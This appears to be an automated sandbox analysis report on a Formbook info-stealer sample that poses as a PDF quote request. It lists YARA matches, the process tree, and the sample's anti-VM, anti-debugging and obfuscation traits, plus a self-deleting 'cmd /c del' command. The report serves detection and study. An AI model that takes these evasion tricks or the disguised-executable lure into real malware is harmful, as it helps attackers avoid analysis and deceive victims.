Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@17/8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004041E5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar, 0_2_004020A6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsp8287.tmp
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Virustotal: Detection: 35%
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File read: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041D067 push ss; ret 2_2_0041D06D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004152DB push esi; rep ret 2_2_004152EA
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0040AB63 push esi; iretd 2_2_0040AB67
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B3FB push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B45C push eax; ret 2_2_0041B462
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00414DEF push ss; iretd 2_2_00414DF0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041C597 push esi; ret 2_2_0041C599
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041CE86 push esi; iretd 2_2_0041CE89
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00414F7F push FFFFFF97h; iretd 2_2_00414FBC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A1D0D1 push ecx; ret 2_2_00A1D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047ED0D1 push ecx; ret 7_2_047ED0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071D067 push ss; ret 7_2_0071D06D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007152DB push esi; rep ret 7_2_007152EA
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0070AB63 push esi; iretd 7_2_0070AB67
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B3F2 push eax; ret 7_2_0071B3F8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B3FB push eax; ret 7_2_0071B462
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B3A5 push eax; ret 7_2_0071B3F8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071B45C push eax; ret 7_2_0071B462
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00714DEF push ss; iretd 7_2_00714DF0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071C597 push esi; ret 7_2_0071C599
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071CE86 push esi; iretd 7_2_0071CE89
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00714F7F push FFFFFF97h; iretd 7_2_00714FBC

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000007085E4 second address: 00000000007085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 000000000070896E second address: 0000000000708974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6872 Thread sleep time: -65000s >= -30000s
Source: C:\Windows\SysWOW64\control.exe TID: 6776 Thread sleep time: -52000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC
Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.670803836.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000002.919593187.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.665596378.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.673241893.000000000A9CA000.00000004.00000001.sdmp Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&|
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.671622692.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000005.00000000.673231089.000000000A9A2000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirXXH
Source: explorer.exe, 00000005.00000002.919263859.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004088A0 rdtsc 2_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00409B10 LdrLoadDll, 2_2_00409B10
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, 0_2_72AD1000
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_026C163F mov eax, dword ptr fs:[00000030h] 0_2_026C163F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_026C1857 mov eax, dword ptr fs:[00000030h] 0_2_026C1857
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A090AF mov eax, dword ptr fs:[00000030h] 2_2_00A090AF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9080 mov eax, dword ptr fs:[00000030h] 2_2_009C9080
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FF0BF mov ecx, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FF0BF mov eax, dword ptr fs:[00000030h] 2_2_009FF0BF
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h] 2_2_00A43884
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A43884 mov eax, dword ptr fs:[00000030h] 2_2_00A43884
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 mov eax, dword ptr fs:[00000030h] 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C58EC mov eax, dword ptr fs:[00000030h] 2_2_009C58EC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00A5B8D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h] 2_2_009C40E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h] 2_2_009C40E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C40E1 mov eax, dword ptr fs:[00000030h] 2_2_009C40E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47016 mov eax, dword ptr fs:[00000030h] 2_2_00A47016
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F002D mov eax, dword ptr fs:[00000030h] 2_2_009F002D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB02A mov eax, dword ptr fs:[00000030h] 2_2_009DB02A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h] 2_2_00A94015
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A94015 mov eax, dword ptr fs:[00000030h] 2_2_00A94015
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h] 2_2_009E0050
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E0050 mov eax, dword ptr fs:[00000030h] 2_2_009E0050
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A82073 mov eax, dword ptr fs:[00000030h] 2_2_00A82073
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A91074 mov eax, dword ptr fs:[00000030h] 2_2_00A91074
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A469A6 mov eax, dword ptr fs:[00000030h] 2_2_00A469A6
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h] 2_2_00A849A4
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h] 2_2_00A849A4
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h] 2_2_00A849A4
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A849A4 mov eax, dword ptr fs:[00000030h] 2_2_00A849A4
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F2990 mov eax, dword ptr fs:[00000030h] 2_2_009F2990
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA185 mov eax, dword ptr fs:[00000030h] 2_2_009FA185
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h] 2_2_00A451BE
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h] 2_2_00A451BE
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h] 2_2_00A451BE
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A451BE mov eax, dword ptr fs:[00000030h] 2_2_00A451BE
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EC182 mov eax, dword ptr fs:[00000030h] 2_2_009EC182
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h] 2_2_009F61A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F61A0 mov eax, dword ptr fs:[00000030h] 2_2_009F61A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A541E8 mov eax, dword ptr fs:[00000030h] 2_2_00A541E8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 2_2_009CB1E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 2_2_009CB1E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CB1E1 mov eax, dword ptr fs:[00000030h] 2_2_009CB1E1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h] 2_2_009C9100
